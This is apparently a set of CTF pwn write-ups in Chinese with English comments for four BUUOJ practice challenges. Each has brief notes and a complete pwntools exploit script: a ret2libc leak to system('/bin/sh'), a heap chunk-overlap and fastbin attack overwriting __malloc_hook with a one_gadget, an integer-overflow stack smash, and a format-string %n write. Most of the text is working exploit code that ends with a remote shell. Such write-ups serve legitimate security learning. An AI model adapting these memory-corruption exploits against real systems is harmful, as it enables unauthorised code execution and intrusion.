puts 泄露 libc, ret2libc: 用 puts@plt 打印 puts@got 得到 puts 在 libc 中的运行时地址, 算出 libc 基址后再次溢出调用 system("/bin/sh")
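from pwn import *
from LibcSearcher import *

# bjdctf_2020_babyrop: leak puts@libc through puts@plt, then ret2libc to system("/bin/sh").
url, port = 'node4.buuoj.cn', 25782
filename = './bjdctf_2020_babyrop'
elf = ELF(filename)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']
# libc = ELF('')
context(arch='amd64', os='linux')
# context(arch='i386', os='linux')
pop_rdi_addr = 0x0000000000400733  # pop rdi; ret  -- TODO confirm with ROPgadget if the binary changes
# Distance from the start of the overflowed buffer to the saved return address
# (presumably a 0x20-byte buffer plus the 8-byte saved rbp).
ret_offset = 0x20 + 8
debug = 0
if debug:
    # context.log_level = 'debug'
    io = process(filename)
    context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)


def B():
    """Attach gdb to the running target and pause (debug helper)."""
    gdb.attach(io)
    pause()


def pwn():
    """Run the two-stage ret2libc attack over the global tube `io`.

    Stage 1 overflows the stack to call puts(puts@got) and returns to main so the
    binary can be overflowed a second time.  Stage 2 resolves system and "/bin/sh"
    from the leaked address via LibcSearcher and calls system("/bin/sh").

    Raises:
        PwnlibException (from log.error) when the leak does not look like a
        userland libc address, instead of feeding garbage to LibcSearcher.
    """
    # Stage 1: leak the runtime address of puts.
    payload = cyclic(ret_offset) + p64(pop_rdi_addr) + p64(puts_got)
    payload += p64(puts_plt) + p64(main_addr)
    io.sendlineafter('story!\n', payload)
    # recvn() blocks until exactly 6 bytes have arrived; recv(6) may return fewer
    # and silently corrupt the leak.
    puts_addr = u64(io.recvn(6).ljust(8, b'\x00'))
    log.info('puts address: %#x' % puts_addr)
    # A userland libc address on x86-64 normally starts with 0x7f; anything else
    # means the bytes we read were not the leak (e.g. a stray newline).
    if puts_addr >> 40 != 0x7f:
        log.error('leak does not look like a libc address: %#x' % puts_addr)

    # Stage 2: resolve system/"/bin/sh" from the leak.  LibcSearcher may offer
    # several candidate libcs; picking the wrong one gives a crash, not a shell.
    libc = LibcSearcher('puts', puts_addr)
    libc_base = puts_addr - libc.dump('puts')
    system_addr = libc_base + libc.dump('system')
    binsh_addr = libc_base + libc.dump('str_bin_sh')
    log.info('libc base: %#x' % libc_base)
    # If system() crashes on a movaps, insert one `ret` gadget before system_addr
    # to realign the stack to 16 bytes.
    payload = cyclic(ret_offset) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
    io.sendlineafter('story!\n', payload)


if __name__ == '__main__':
    pwn()
    io.interactive()

# babyheap_0ctf_2017   (heading of the next write-up; extraction fused it onto this line)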
直接参考我之前写的blog
https://blog.csdn.net/qq_33976344/article/details/119904057
堆块重叠 (chunk overlap) + unsorted bin 泄露 main_arena 地址, 再用 fastbin attack 把 __malloc_hook 改成 one_gadget
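from pwn import *

# babyheap_0ctf_2017 (glibc 2.23 era): chunk overlap -> unsorted-bin leak of a
# main_arena pointer -> fastbin attack on __malloc_hook -> one_gadget.
url, port = 'node4.buuoj.cn', 25085
filename = './babyheap_0ctf_2017'
elf = ELF(filename)
# libc = ELF('')
debug = 0
if debug:
    context.log_level = 'debug'
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

# libc offsets, hard-coded for the remote libc.  They must be re-derived
# (pwntools / one_gadget) if the target libc changes.
MAIN_ARENA_OFFSET = 0x3c4b78      # offset of the value a freed unsorted chunk's fd points to
MALLOC_HOOK_OFFSET = 0x00000000003c4b10
FAKE_CHUNK_OFFSET = 0x3c4afd      # __malloc_hook - 0x13; presumably the 0x7f byte there reads as a valid 0x70 fastbin size
ONE_GADGET_OFFSET = 0x4526a       # alternative candidate: 0x45216


def alloc(size):
    """Menu option 1: allocate a chunk of `size` bytes (slot index chosen by the program)."""
    io.sendlineafter('Command: ', '1')
    io.sendlineafter('Size: ', str(size))


def fill(idx, cont):
    """Menu option 2: write `cont` into chunk `idx`.

    The program accepts any length, so writing past the chunk size is the heap
    overflow the exploit relies on.
    """
    io.sendlineafter('Command: ', '2')
    io.sendlineafter('Index: ', str(idx))
    io.sendlineafter('Size: ', str(len(cont)))
    io.sendafter('Content: ', cont)


def free(idx):
    """Menu option 3: free chunk `idx`."""
    io.sendlineafter('Command: ', '3')
    io.sendlineafter('Index: ', str(idx))


def dump(idx, n=None):
    """Menu option 4: read back the contents of chunk `idx`.

    With n=None (the original behaviour) one line is returned, which truncates
    the data at the first 0x0a byte.  Pass n to read exactly n raw bytes instead;
    use that whenever the content is a pointer, which may contain 0x0a.
    """
    io.sendlineafter('Command: ', '4')
    io.sendlineafter('Index: ', str(idx))
    io.recvuntil('Content: \n')
    if n is None:
        return io.recvline()
    return io.recvn(n)


def pwn():
    """Drive the full exploit over the global tube `io` and drop to a shell.

    Slot numbers in the comments assume the program hands out the lowest free
    index (consistent with the fill(6) the original author used).
    """
    # Chunks 0-3 are 0x20-sized fastbin chunks, chunk 4 is a 0x90 small chunk.
    alloc(0x10)  # idx 0
    alloc(0x10)  # idx 1
    alloc(0x10)  # idx 2
    alloc(0x10)  # idx 3
    alloc(0x80)  # idx 4
    free(1)
    free(2)      # fastbin 0x20: chunk2 -> chunk1
    # Overflow from chunk 0 through chunks 1 and 2, rewriting their headers and
    # setting the low byte of chunk 2's fd to 0x80 so it points at chunk 4.
    payload = cyclic(16) + p64(0) + p64(0x21) + cyclic(16) + p64(0) + p64(0x21) + p8(0x80)
    fill(0, payload)
    # Give chunk 4 a fake 0x21 size so malloc's fastbin size check accepts it.
    payload = cyclic(16) + p64(0) + p64(0x21)
    fill(3, payload)
    alloc(0x10)  # idx 1: chunk 2's old memory
    alloc(0x10)  # idx 2: same memory as idx 4 (overlap)
    # Restore chunk 4's real size, then allocate once more so that freeing chunk 4
    # does not merge it into the top chunk.
    payload = cyclic(16) + p64(0) + p64(0x91)
    fill(3, payload)
    alloc(0x80)  # idx 5
    free(4)      # unsorted bin: chunk 4's fd now points into main_arena
    # Read the pointer through the overlapping idx 2.  Exactly 8 raw bytes: a line
    # read would stop early if the pointer contained a 0x0a byte.
    main_arena_addr = u64(dump(2, 8))
    libc_base = main_arena_addr - MAIN_ARENA_OFFSET
    __malloc_hook_addr = libc_base + MALLOC_HOOK_OFFSET
    one_gadget_addr = libc_base + ONE_GADGET_OFFSET
    log.info('main_arena_addr 0x%x' % main_arena_addr)
    log.info('libc_base 0x%x' % libc_base)
    log.info('__malloc_hook_addr 0x%x' % __malloc_hook_addr)
    log.info('one_gadget_addr 0x%x' % one_gadget_addr)
    # libc is mapped page aligned; a misaligned base means the leak or the
    # hard-coded offsets are wrong, and continuing would only corrupt the heap.
    if libc_base & 0xfff:
        log.error('libc_base is not page aligned, leak or offsets are wrong: %#x' % libc_base)
    # Fastbin attack: allocate a 0x70 chunk over idx 4, free it, then overwrite
    # its fd (still reachable through the overlapping idx 2) with the fake chunk
    # just below __malloc_hook.
    alloc(0x60)  # idx 4
    free(4)
    payload = p64(libc_base + FAKE_CHUNK_OFFSET)  # link fake chunk into fastbin
    fill(2, payload)
    alloc(0x60)  # idx 4: the real chunk again
    alloc(0x60)  # idx 6: the fake chunk, user data starts at __malloc_hook - 3
    payload = p8(0) * 3 + p64(one_gadget_addr)  # change __malloc_hook
    fill(6, payload)
    alloc(233)  # any malloc now goes through __malloc_hook -> one_gadget
    io.interactive()


if __name__ == '__main__':
    pwn()

# pwn2_sctf_2016   (heading of the next write-up; extraction fused it onto this line)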
整数溢出 (长度处输入 -1 绕过检查), 然后栈溢出: 先用 printf 泄露 printf@got 的内容, 再 ret2libc
LibcSearcher 并不可靠: 它严重依赖 libc-database 的数据, 库不全或者目标 libc 版本偏门时会浪费大量时间试错, 最好另外确认远程 libc 的版本
最后尝试出来服务器上的libc版本为
ubuntu-xenial-amd64-libc6-i386 (id libc6-i386_2.23-0ubuntu10_amd64)
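from pwn import *
from LibcSearcher import *

# pwn2_sctf_2016 (i386): a -1 length slips past the size check, giving a stack
# overflow; printf is reused to leak printf@got, then ret2libc to system("/bin/sh").
url, port = 'node4.buuoj.cn', 28087
filename = './pwn2_sctf_2016'
elf = ELF(filename)
# libc = ELF('')
# context(arch='amd64', os='linux')
context(arch='i386', os='linux')
debug = 0
if debug:
    context.log_level = 'debug'
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)


def B():
    """Attach gdb to the running target and pause (debug helper)."""
    gdb.attach(io)
    pause()


def pwn():
    """Run the two-stage attack over the global tube `io`.

    Stage 1 returns into printf@plt with a "%s"-style format string from the
    binary and printf@got as its argument, which prints printf's libc address,
    then returns to main.  Stage 2 calls system("/bin/sh") with the resolved
    addresses.  LibcSearcher may list several candidate libcs; the one that
    worked for the remote target is noted above this script.
    """
    offset = 0x2C                 # presumably buffer size; +4 below skips the saved ebp
    fmtstr_addr = 0x080486F8      # format string inside the binary used for the leak -- TODO confirm contents
    printf_plt = elf.plt['printf']
    printf_got = elf.got['printf']
    main_addr = elf.sym['main']
    # -1 passes the length check but is then used as a huge read size (the
    # integer overflow), so the following read overflows the stack buffer.
    io.sendlineafter('read? ', '-1')
    payload = cyclic(offset + 4) + p32(printf_plt) + p32(main_addr)
    payload += p32(fmtstr_addr) + p32(printf_got)
    io.sendlineafter('data!\n', payload)
    # First "You said: " is the program echoing our input, the second comes from
    # the printf we returned into.
    io.recvuntil('You said: ')
    io.recvuntil('You said: ')
    # recvn(4) waits for all four bytes; recv(4) may return fewer.
    printf_addr = u32(io.recvn(4))
    log.info('printf address: %#x' % printf_addr)
    libc = LibcSearcher('printf', printf_addr)
    libc_base = printf_addr - libc.dump('printf')
    system_addr = libc_base + libc.dump('system')
    binsh_addr = libc_base + libc.dump('str_bin_sh')
    log.info('libc base: %#x' % libc_base)
    io.sendlineafter('read? ', '-1')
    payload = cyclic(offset + 4) + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
    io.sendlineafter('data!\n', payload)


if __name__ == '__main__':
    pwn()
    io.interactive()

# jarvisoj_fm   (heading of the next write-up; extraction fused it onto this line)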
泄露位置是 11 (输入缓冲区在 printf 可变参数中的偏移)
格式化字符串 %n 写: 要把 x 改成 4, 而 %n 写入的是已输出的字符数, 所以前面只放 4 个字符 ('ZZZZ'); 把目标地址放在输入的第 12 字节处, 对应参数位置 11 + 3 = 14, 用 %14$n 写入
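from pwn import *

# jarvisoj_fm (i386): single format-string write that sets a global to 4.
url, port = 'node4.buuoj.cn', 28731
filename = './fm'
elf = ELF(filename)
# libc = ELF('')
# context(arch='amd64', os='linux')
context(arch='i386', os='linux')
local = 0
if local:
    context.log_level = 'debug'
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

TARGET_ADDR = 0x0804A02C   # the variable that must become 4 (TODO: replace with elf.sym[...] once the symbol name is known)
FMT_OFFSET = 11            # position of our input buffer among printf's arguments


def B():
    """Attach gdb to the running target and pause (debug helper)."""
    gdb.attach(io)
    pause()


def pwn():
    """Send the format-string payload that writes 4 to TARGET_ADDR.

    Layout: 'ZZZZ' (4 bytes printed, so %n writes 4), '%14$n', 'ZZZ' padding so
    the address lands at byte 12 of the input, i.e. argument FMT_OFFSET + 3 = 14.
    """
    payload = b'ZZZZ%14$nZZZ' + p32(TARGET_ADDR)  # p32 -> b'\x2c\xa0\x04\x08'
    io.sendline(payload)


if __name__ == '__main__':
    pwn()
    io.interactive()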



